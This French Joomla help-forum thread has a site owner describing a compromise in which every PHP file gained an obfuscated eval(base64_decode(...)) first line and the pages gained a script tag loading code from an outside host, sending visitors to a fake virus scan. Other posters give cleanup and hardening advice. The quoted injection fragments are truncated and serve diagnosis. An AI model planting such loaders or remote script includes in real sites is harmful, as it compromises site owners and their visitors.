attaque de mon site : tous les fichiers .php modifiés

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] attaque de mon site : tous les fichiers .php modifiés

    Bonjour,

    Hier dans l'après midi, tous les fichiers de mon site ont été modifiés. Le pirate a ajouté en première ligne une instruction php commencant par :

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl 9zdGF

    Résultat : tous mes visiteurs sont redirigés vers une page commencant par www1.fine-guardsave (voir image attachée) leur faisant croire qu'un scan de leur disque dur est en cours et qu'il détecte des virus et propose le téléchargement d'un fichier .exe.

    1) quelqu'un a t il déjà été l'objet d'une attache similaire ? Si oui comment s'en protéger ?
    2) A part recharger tous les fichiers du site, y a t il une solution ?
    Fichiers joints

  • #2
    Je craque !!!

    En regardant le source de la page d'accueil, je trouve cela :

    <div><a href="http://www.joomla.org">Joomla!</a> est un logiciel libre sous <a href="http://www.gnu.org/licenses/gpl-2.0.html">licence GNU/GPL.</a></div>
    </div>
    </div>

    </div>
    </div> <!-- //FOOTER -->

    </div>

    <script src="http://meqashopperonline.com/mm.php"></script> => je ne sais pas d'où cela vient, mais là est mon soucis
    </body>

    </html>

    Quelqu'un pourrait il me donner une piste pour chercher dans quel fichier cet enfoi.. de pirate à inclus le lancement de ce script ?

    Commentaire


    • #3
      Bonsoir,

      Cela peut être partout, mais commence par regarder dans les fichiers index.php du site et de ton template, mais de toutes les façons tu vas avoir du boulot, parce qu'il faut savoir par ou il est passé.

      Joomla est-il à jour ? Tes composants/modules/plugins etc. il faut tout contrôler, et une fois sur modifier tous les mots de passe.

      A+

      Commentaire


      • #4
        Bonsoir,

        Avant de comprendre par où ils sont passés (tu n'es pas le seul, ni le premier ni le dernier), il faut rétablir le site.

        J'espère que tu disposes d'un backup (même de plusieurs dont un avant l'attaque).

        Dans ce cas de figure, c'est souvent la solution la plus simple pour remettre le site en fonctionnement.

        La restauration du backup ne va en rien résoudre le problème de fond. Pour cela, il faut au moins nous fournir la version de joomla ansi que la liste complète des extensions pour déterminer l'objet de la vulnérabilité.

        Dans un troisième temps, ce forum de sécurité délivre de nombreuses informations pour sécuriser le site et qu'il faudra appliquer.

        Cordialement,
        Joël

        Commentaire


        • #5
          Salut,

          Version joomla au moment de l'attaque 1.5.17. Depuis je suis passé en 1.5.20.

          Composant : Acymailing, Jce, Joomlapack,K2, Phoca Gallery et Guestbook, JSN ImageShow.

          Depuis j'ai effectivement change le mot de passe ftp, installé crawltrack.

          Je crois qu'effectivement je ne vais pas couper à la restoration du site, mais j'aurai effectivement bien aimé comprendre par ou il est passé.

          J'ai vérifié, rien dans l'index.php du site ou du template (d'ailleurs si je change de template, cela ne change rien).

          Commentaire


          • #6
            Bien j'ai trop honte. J'ai trouvé le pourquoi mon site n'était pas protégé ( diable comment peut on oulié de renommer le htaccess.txt en .htaccess).

            Commentaire


            • #7
              Bonsoir,

              Je pense que j'ai le meme clown que toi sur un de mes sites. joomla 1.5.21 avec plugin sentinelle et jsecure
              J'ai les memes sympthomes en tout cas

              Mais je n'ai plus acces a l'admin il a remplacé la page par une page blanche avec juste ...€

              Par contre avec mon mac, je peut aller sur le site et il n'y a rien d'anormal sauf l'admin ...

              Et ce qui me semble bizzare, c'est que je gere 2 sites avec le meme pc donc le meme client ftp et je n'ai le probleme que sur un des deux sites???

              Mais tout cela ne me dit toujours pas comment il est entré.

              Et là, je cale

              Commentaire


              • #8
                Bonsoir,

                il n' y a pas que Joomla himself à contrôler pour les maj, mais aussi tous les composants/modules/plugins tiers à mettre à jour le cas échéant bien sûr. Voir même certains template notamment ceux intégrant un framework propriétaire.

                Et ce qui me semble bizzare, c'est que je gere 2 sites avec le meme pc donc le meme client ftp et je n'ai le probleme que sur un des deux sites???
                Peut-être aussi que un seul a suffit pour l'amuser, de toutes les façons il ne faut pas enregistrer ses mots de passe ftp, mieux vaut les saisir à chaque connexion, mais là pour le coup il faut les changer et aussi contrôler ta machine au cas ou.

                A+

                Commentaire


                • #9
                  Merci pour ton aide, maintenant, me reste plus qu'a controler mon pc

                  Commentaire


                  • #10
                    Bonjour a tous,

                    J'ai changé et NON mémorisé mot de passe FileZilla.

                    Et bien voilà, j'ai passé Spybot sur mon pc et tout semble clean, j'ai aussi log hijackthis mais je ne sais pas tres bien quoi en faire.

                    J'ai vu plein de forum sur google mais le quel choisir ?

                    Que faire d'autre ?

                    Sinon, mon probleme reste entier, je me pose toujours la meme question à savoir : Mais par ou est il entré ???

                    Quelqu'un peut il éclairer ma lanterne ?

                    Yquem
                    Dernière édition par yquem à 20/10/2010, 14h59

                    Commentaire


                    • #11
                      Si ton PC est clean, l'intrus est entré soit par une faille d'un composant vulnérable et pas à jour (le plus classique), soit par une faille sur un serveur chez ton hébergeur (plus rare).

                      Nettoies ton site, vérifies que tous tes composants sont bien à jour en version, ainsi que Joomla.

                      Installes la suite CrawlProtect / CrawlTrack, et tu auras déjà une bien meilleure sécurité. Pour les détails, les discussions épinglées de ce sous-forum sont très riches en informations...
                      Pas de demande de support par MP.
                      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                      Commentaire


                      • #12
                        Bonjour,

                        merci pour ton aide, j'essaye ça ce soir

                        Yquem

                        Commentaire


                        • #13
                          bonsoir a tous,

                          Plus je nettoye, plus il y a de code "bizzare" dans mes fichiers index...

                          Voila comment je procede : je prend le premier fichier .index que je trouve dans l'arborescence du site, je repere le code a supprimer ( toujours en premiere ligne), je fais une recherche sur tout le site avec notepad++, je remplace le code par un espace donc en theorie, le mechant code est supprimé sauf qu'un autre vient se remettre a sa place, j'ai reccommencé la manip plusieurs fois et a chaque fois ça revient...

                          Là, j'en perd mon latin...

                          Je précise que je fait tout cela en local sans connexion internet

                          Merci pour votre aide car je n'ai pas de copie clean du site

                          Yquem

                          Commentaire


                          • #14
                            Bonsoir,

                            je fais une recherche sur tout le site avec notepad++, je remplace le code par un espace donc en theorie, le mechant code est supprimé sauf qu'un autre vient se remettre a sa place, j'ai reccommencé la manip plusieurs fois et a chaque fois ça revient
                            Normal !!!

                            Ils sont déjà dans la place

                            La seule vraie solution (quand on ne connait pas toutes les finalités du problème) :

                            1 : Réinstaller un backup avant infection
                            2 : Mise à jour de joomla si nécessaire
                            3 : Recherche sur la liste de vulnérabilité des toutes les extensions installées
                            4 : mise à jour des extensions établies comme étant vulnérables (ou suppression si pas de patchs)
                            5 : dans tous les cas, et par défaut, modification de tous les mots de passes ftp
                            6 : installation d'un traceur et d'un système de protection (CrawlProtect / CrawlTrack)

                            Après, s'ils sont passés par une station locale (dernière MAJ Anti Virus, ...)
                            Et le mieux est d'encapsuler filezilla dans une VM indépendante protégée

                            Cordialement,
                            Joël
                            Dernière édition par jovdev à 26/10/2010, 23h17

                            Commentaire


                            • #15
                              Bonsoir et merci pour tes conseils, mais je n'ai pas de backup avant infection... donc, il me faut nettoyer a la main

                              6 : installation d'un traceur et d'un système de protection (CrawlProtect / CrawlTrack)
                              c'est quoi un traceur et peut tu me donner un lien pour le telechargement de CrawlProtect / CrawlTrack ?

                              Et le mieux est d'encapsuler filezilla dans une VM indépendante protégée
                              ca veut dire quoi au juste ?

                              Merci d'avance

                              Yquem

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X